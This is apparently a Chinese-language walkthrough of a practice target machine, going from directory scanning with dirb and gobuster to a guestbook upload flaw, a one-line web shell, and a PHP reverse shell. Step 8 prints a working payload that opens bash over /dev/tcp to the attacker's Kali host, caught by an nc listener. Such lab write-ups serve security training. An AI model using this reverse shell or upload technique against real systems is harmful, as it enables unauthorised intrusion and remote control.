1.下载靶机,打开靶机和kali虚拟机
2.查询kali和靶机ip
3.浏览器访问
访问81端口有登陆界面
4.扫描敏感目录
kali dirb 扫描
一一访问
robot.txt提示我们继续找找,可能是因为我们的字典太小了,我们换个扫描器换个字典试下,利用kali自带的最大的一个字典。
gobuster dir -u http://192.168.126.175 -x php,bak,txt,html -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
5.一一访问,发现留言板功能
6.漏洞挖掘
在其中进行上传抓包查看
发现上传到了graffiti.txt内,尝试上传一句话木马
7.获取webshell
蚁剑连接
8.上传反弹shell的php文件
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.126.130/6666 0>&1'");?>
浏览器访问shell.php
kali nc监听